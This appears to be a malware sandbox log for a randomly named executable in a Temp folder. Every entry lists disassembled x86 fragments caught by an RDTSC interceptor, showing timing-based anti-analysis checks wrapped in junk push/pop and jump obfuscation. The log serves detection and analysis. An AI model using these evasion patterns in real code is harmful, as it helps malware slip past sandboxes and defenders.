Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D5A319 second address: D5A31D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D5F66E second address: D5F68B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6AE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D5FAA4 second address: D5FAAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D5FAAA second address: D5FABE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC4CCEF6ADFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D5FBAB second address: D5FBC7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC4CC910586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC4CC910590h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D5EC8F second address: D5EC94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D610AB second address: D610B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D610B0 second address: D610B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D610B7 second address: D610D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jp 00007FC4CC910598h 0x0000000d jmp 00007FC4CC91058Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D2473D second address: D2476E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC4CCEF6AD6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FC4CCEF6AE1h 0x00000011 jmp 00007FC4CCEF6ADDh 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c pop edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D2476E second address: D2477A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC4CC910586h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D674C1 second address: D67507 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6AE8h 0x00000007 jmp 00007FC4CCEF6AE1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007FC4CCEF6AE9h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D67666 second address: D67685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC4CC910599h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D67685 second address: D676C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FC4CCEF6AF3h 0x0000000b pushad 0x0000000c push ebx 0x0000000d jmp 00007FC4CCEF6AE0h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D676C1 second address: D676EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007FC4CC91058Ch 0x0000000b je 00007FC4CC910586h 0x00000011 jnl 00007FC4CC910586h 0x00000017 jl 00007FC4CC910586h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jl 00007FC4CC910586h 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D67839 second address: D6783D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D6783D second address: D6785A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 jmp 00007FC4CC91058Bh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edi 0x0000000e push ecx 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop ecx 0x00000012 pushad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D68EAF second address: D68EB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D690EF second address: D690F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D7AB93 second address: D7AB9D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC4CC910586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D716F4 second address: D716F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D716F8 second address: D716FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D7BB00 second address: D7BB0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6ADBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D7CB1F second address: D7CB23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D7CB23 second address: D7CB29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D7CB29 second address: D7CB2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D801D3 second address: D801D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D823AD second address: D82454 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC910599h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FC4CC910588h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 xor dword ptr [ebp+12476725h], ebx 0x0000002c push dword ptr fs:[00000000h] 0x00000033 jmp 00007FC4CC910590h 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f jmp 00007FC4CC910592h 0x00000044 mov eax, dword ptr [ebp+122D0D51h] 0x0000004a sub dword ptr [ebp+1245B88Eh], edx 0x00000050 push FFFFFFFFh 0x00000052 mov edi, dword ptr [ebp+122D2DC5h] 0x00000058 nop 0x00000059 push eax 0x0000005a push edx 0x0000005b jo 00007FC4CC910598h 0x00000061 jmp 00007FC4CC910592h 0x00000066 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D82454 second address: D82459 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D82459 second address: D8245F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D71A66 second address: D71A70 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC4CCEF6AD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D71A70 second address: D71A75 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D71B66 second address: D71BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007FC4CCEF6AD8h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 call 00007FC4CCEF6ADFh 0x00000028 jmp 00007FC4CCEF6AE2h 0x0000002d pop edx 0x0000002e lea eax, dword ptr [ebp+1248557Dh] 0x00000034 movzx edx, dx 0x00000037 nop 0x00000038 pushad 0x00000039 push eax 0x0000003a jnl 00007FC4CCEF6AD6h 0x00000040 pop eax 0x00000041 push edi 0x00000042 push ebx 0x00000043 pop ebx 0x00000044 pop edi 0x00000045 popad 0x00000046 push eax 0x00000047 pushad 0x00000048 pushad 0x00000049 jmp 00007FC4CCEF6AE9h 0x0000004e jc 00007FC4CCEF6AD6h 0x00000054 popad 0x00000055 push eax 0x00000056 push edx 0x00000057 push edi 0x00000058 pop edi 0x00000059 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D71BED second address: D71C3A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC4CC910586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FC4CC910588h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 add edx, 37BAB008h 0x0000002c add dword ptr [ebp+122D33DAh], ebx 0x00000032 lea eax, dword ptr [ebp+12485539h] 0x00000038 nop 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c jo 00007FC4CC910586h 0x00000042 push esi 0x00000043 pop esi 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D71C3A second address: D518D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6AE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC4CCEF6ADEh 0x0000000f nop 0x00000010 js 00007FC4CCEF6ADCh 0x00000016 and ecx, dword ptr [ebp+122D3AB9h] 0x0000001c call dword ptr [ebp+122D1D26h] 0x00000022 jl 00007FC4CCEF6AFBh 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c push esi 0x0000002d pop esi 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA01D2 second address: DA01D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA01D6 second address: DA01DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA0368 second address: DA0380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC4CC910594h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA0380 second address: DA03A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6ADFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c jnp 00007FC4CCEF6AD6h 0x00000012 push edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA2036 second address: DA203A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA203A second address: DA205B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC4CCEF6AE5h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA362F second address: DA364B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC910596h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA8A78 second address: DA8A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA8A7E second address: DA8A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA8A83 second address: DA8A9C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop edi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FC4CCEF6AD6h 0x00000013 jno 00007FC4CCEF6AD6h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA8A9C second address: DA8ACF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC91058Bh 0x00000007 ja 00007FC4CC910586h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007FC4CC910586h 0x00000017 jmp 00007FC4CC910596h 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA8ACF second address: DA8AD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA7896 second address: DA78A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jbe 00007FC4CC910586h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA78A5 second address: DA78A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA78A9 second address: DA78CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007FC4CC91059Ch 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA78CE second address: DA78D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FC4CCEF6AD6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA7A5A second address: DA7A64 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC4CC910586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA7A64 second address: DA7A6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FC4CCEF6AD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA7E3E second address: DA7E44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA7490 second address: DA749B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jl 00007FC4CCEF6AD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA8104 second address: DA8108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA8108 second address: DA8155 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6AE8h 0x00000007 jng 00007FC4CCEF6AD6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FC4CCEF6ADFh 0x00000014 jp 00007FC4CCEF6ADEh 0x0000001a push eax 0x0000001b push edx 0x0000001c jbe 00007FC4CCEF6AD6h 0x00000022 jnl 00007FC4CCEF6AD6h 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA8155 second address: DA816F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007FC4CC91058Eh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA816F second address: DA8173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA8173 second address: DA8179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA8433 second address: DA843E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC4CCEF6AD6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA843E second address: DA8464 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC4CC910591h 0x00000008 jmp 00007FC4CC91058Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FC4CC91058Bh 0x00000015 push edi 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DADF2D second address: DADF33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DAD1B2 second address: DAD1B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DAD1B6 second address: DAD1C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jp 00007FC4CCEF6AD6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DAD2F2 second address: DAD2F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DAD2F6 second address: DAD302 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007FC4CCEF6AD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DAD302 second address: DAD321 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC91058Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DAD321 second address: DAD327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DAD327 second address: DAD32D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DAD32D second address: DAD333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DAD333 second address: DAD338 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DAD338 second address: DAD33E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DAD861 second address: DAD870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DAD9B9 second address: DAD9BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DAD9BD second address: DAD9C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
